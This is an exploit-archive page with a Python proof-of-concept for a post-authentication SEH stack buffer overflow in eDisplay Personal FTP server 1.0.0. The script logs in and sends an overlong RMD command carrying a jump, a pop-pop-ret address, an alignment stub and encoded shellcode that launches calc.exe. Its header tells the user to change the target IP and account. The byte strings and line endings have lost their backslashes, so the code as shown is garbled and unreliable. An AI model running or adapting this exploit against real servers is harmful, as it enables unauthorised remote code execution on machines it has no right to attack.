eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Stack BOF

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Stack BOF
# Published : 2010-03-25
# Author : Sud0
# Previous Title : SAP MaxDB Malformed Handshake Request Remote Code Execution
# Next Title : SAP GUI version 7.00 BExGlobal Active-X unsecure method

# Exploit Title : eDisplay Personal FTP server 1.0.0 Multiple Post-Authentication Stack BOF
# Type of sploit: Remote Code Execution
# Bug found by  : loneferret  (march 19, 2010)
# Reference     : http://www.exploit-db.com/exploits/11810
# Exploit date  : March 24, 2010
# Author        : Sud0
# Version       : 1.0.0
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH
# Greetz to     : corelanc0d3r and of course my friends and .... first of all my wife for supporting me and my obsession :)
# Change IP and ftp account according to your server

import socket
 
junk="B" * 37 #seh overwritten after 37 bytes
nseh= "x74x20x74x20" # jmp forward (used a JE to avoid Bad Chars)
seh= "x69x40x2bx20" # ppr from 

#shellcode for calc.exe encoded with Alpha2 basereg = eax
shellcode="PYIIIIIIIIIIQZVTX30VX4AP0A3HH0A00ABAABTAAQ2AB2BB0BBXP8ACJJILKJLV5LKJL3XQ0WPQ0FOCXU33Q2LSSLMPEZXV0NX9WMCIRSGKO8PA" 

#shellcode to align eax for decoder
align="x5Ax5Ax5Ax52x58x2Dx3Bx55x55x55x2Dx3Bx55x55x55x2Dx3Bx55x55x55"

buffer= junk+nseh+seh + "C"* 26  + align + "C" * 25 + shellcode + "A" * 50

print "Sending Exploit .... rn"
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.56.101',21))
s.recv(1024)
s.send('USER foxrn')
s.recv(1024)
s.send('PASS mulderrn')
s.recv(1024)
s.send('RMD ' + buffer + 'rn')
s.close